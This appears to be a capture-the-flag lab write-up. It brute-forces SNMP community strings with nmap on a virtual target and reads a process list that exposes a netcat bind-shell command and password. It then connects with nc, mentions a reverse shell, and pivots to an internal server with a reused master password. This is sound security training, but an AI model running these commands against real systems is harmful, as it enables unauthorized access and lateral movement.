Nmap Challenge
We have some community strings on our desktop. Target IP: 192.168.6.2
I found this command on the nmap official website:
nmap -sU --script snmp-brute <target> [--script-args snmp-brute.communitiesdb=<wordlist> ]
It requires sudo
I used this command:
sudo nmap -sU -p 161 --script=snmp-brute.nse --script-args snmp-brute.communitiesdb=./Desktop/common-snmp-community-strings.txt 192.168.6.2
and got this:
PORT STATE SERVICE
161/udp open snmp
| snmp-brute:
|_ read-write - Valid credentials
MAC Address: 52:54:00:34:59:A4 (QEMU virtual NIC)
I used this command to get the processes:
sudo nmap -sU -p 161 --script=snmp-processes.nse --script-args creds.snmp=read-write 192.168.6.2
And I found there interesting strings:
Params: -c cat /tmp/f | /root/remote-access-terminal.sh --password 97c9c14b90df1d8c | nc -l 8686 > /tmp/f
Params: /root/remote-access-terminal.sh --password 97c9c14b90df1d8c
We have open port (8686) on the target machine so we can use netcat to establish a bind shell.
My command for that:
nc 192.168.6.2 8686
Then bla bla bla and then we have have to pass the password that we saw in the processes.
Once we did it we have the shell and we can read the first flag.
Now it is interesting to look at the remote-access-terminal.sh script.
MASTER_PASSWORD=4b068d23e1f0e2a4 # Master password applicable across all servers, DO NOT DISTRIBUTE!
Interesting string.
I opened a reverse shell and then upgraded it.
Internal server's IP: 172.16.40.66 It looks like we have the same open port on the internal server.
A little bit later I found out that that was not the internal server. Using nmap command like: nmap 172.16.40.0/24 I found that the internal server is 172.16.40.67.
We have a reason to say that we can connect to the internal server the same way we have done it before connecting to the machine. And also we know that we have the super key that is going to open our door to the server.
So now:
nc 172.16.40.67 8686 then enter the super password and here we go.